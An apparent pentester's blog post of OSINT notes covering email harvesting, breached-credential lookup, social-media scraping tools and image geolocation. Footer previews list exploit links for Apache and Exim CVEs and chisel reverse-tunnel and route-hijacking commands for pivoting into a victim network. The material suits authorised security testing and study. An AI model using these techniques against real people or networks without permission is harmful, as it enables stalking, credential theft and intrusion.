Skip to main content

OSINT

 


MindMap for OSINT

- DNS Enum - Domian/Subdomain
- Check the Services/Applications Running
- Organization Details
- Organization users
- Organization Job Profiles 
- Google Dorks - Follow Google Hacking Database
User Recon - Finding Emails

- Check for the files on the website, download and exif all the files for info on the users. Use ExifTool, Strings
- PowerMeta can be used to gather the data from a domain
- hunter.io - Can be used to find email address available online, free for first few times
- Awesome tool for finding Emails - Phonebook.cz
- voilanorbert.com - Gives 50 Free emails
- clearbit.com - Chrome Extension
- check if the email is valid or not - Verifalia.com / verifyemailaddress.org
- Find Users from Linkedn via BridgeKeeper
python bridgekeeper.py -c website.com
#can use the wordlist generator to create a set of wordlist "git clone https://github.com/captain-noob/username-list-generator.git"

- Automated recon using SpiderFoot
Gathering Breached Credentials

- Use heathadams breach-parse to find breached creds from a credential dump
- Haveibeenpwned.com - Check if the email is present in some breach
- Dehashed.com
-
Organization Technology Finder
#Similar to Wappalyzer but gives detailed information

https://builtwith.com/
Search Social Media Accounts of a user 

git clone https://github.com/sherlock-project/sherlock.git
python3 sherlock username --timeout 1
Twitter OSINT 

https://github.com/twintproject/twint

pip3 install twint

twint -u username 
Instagram OSINT - Instaloader

https://github.com/instaloader/instaloader 

#Installation
pip3 install instaloader

#Usage
instaloader profile UserName

#Downlaod GeoTags - might have to login 
instaloader -G UserName


Instagram OSINT - Osintgram
git clone https://github.com/Datalux/Osintgram.git
cd Osintgram
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

#update your creds in credentials.ini file in config folder

#Start Enum
python3 main.py TargetUserName
Finding Users/Locations with Images - Image Reverse Search

use the chrome extension Fake News Debunker by Inv and right Click on the image select the extension and "Search All" 

- This will open a new tab on the browser with all search engines reverse search for the selected image. 
- You can also, go to https://lens.google.com, upload an image and look for it 
- if you want to add some text to image search, right click on the image and click "Scan with Google Lens", here is an option to add text 
- You can also use Yandex Image Search   
Image Reverse Seach - EXIF/Location

# Find Latitude and Longitude
- on Windows, you can right click on an image --> properties --> Details --> GPS 
- There are multiple online exif viewers as well
- or use Exif Viewer Pro Chrome Extension, use it by right clicking on the image and Select "Show EXIF Data"
- or use an offline version of EXIF Tool


# Youtube Metadata Viewer
go to https://mattw.io/youtube-metadata/ 


- First try to create a proper image of the location that you are looking for - search it on google, social media - find any clues 
- if it's a video, try to take multiple snaps from different angles and create a proper panorama, and use that as a source image 
- use google maps, Google Earth, Sentinel-Hub - 30 Days free trail - has more timelines of the satellite imagery (can be used to find an exact date of when something happened)
Creating Satellite Image Timelapse 

  • go to Sentinal-hub EO browser and go to the location that you are looking by entering it in search
  • click on "Timeline" icon on the right side
  • Choose timeframe, no of frames and click download.

 

 

 

 

Comments

Popular posts from this blog

POC Links for CVE's

  Serach for a CVE here first - Trickest/cve Apache CVE-2024-38475 - CVE-2024-38475 #version less than 2.4.51 CVE-2021-44790 - h ttps://www.exploit-db.com/exploits/51193 #Apache HTTP Server 2.4.50 CVE-2021-42013 - https://www.exploit-db.com/exploits/50406 use https://github.com/mrmtwoj/apache-vulnerability-testing for below CVE's CVE-2024-38472: Apache HTTP Server on Windows UNC SSRF CVE-2024-39573: mod_rewrite proxy handler substitution CVE-2024-38477: Crash resulting in Denial of Service in mod_proxy CVE-2024-38476: Exploitable backend application output causing internal redirects CVE-2024-38475: mod_rewrite weakness with filesystem path matching CVE-2024-38474: Weakness with encoded question marks in backreferences CVE-2024-38473: mod_proxy proxy encoding problem CVE-2023-38709: HTTP response splitting EXIM #suppodily should work for versions below Exim 4.96.1 - is not accurate CVE-2023-42115 - https://github.com/AdaHop-Cyber-Security/Pocy/tree/main

Pivoting into an internal network behind firewall

    Accessing a Victim network from Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 or ./chisel server --port 9001 -reverse #On Victim ./chisel.exe client 10.10.10.1:9001 R:0.0.0.0:1080:socks .\chisel.exe client 10.10.10.1:9001 R:8080:127.0.0.1:8080 R:8888:127.0.0.1:8888 R:9090:127.0.0.1:9090 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from windows box. #If the above doesnt work #asuming Kali and windows are on Eht0 #add a firewall rule to allow Kali ip traffic netsh advfirewall firewall add rule name="Allow VPN Traffic" dir=in action=allow protocol=any remoteip=KALI_ETH0_IP #on Kali - Allow tun0 traffic to forward on iptables sudo iptables -P FORWARD ACCEPT ...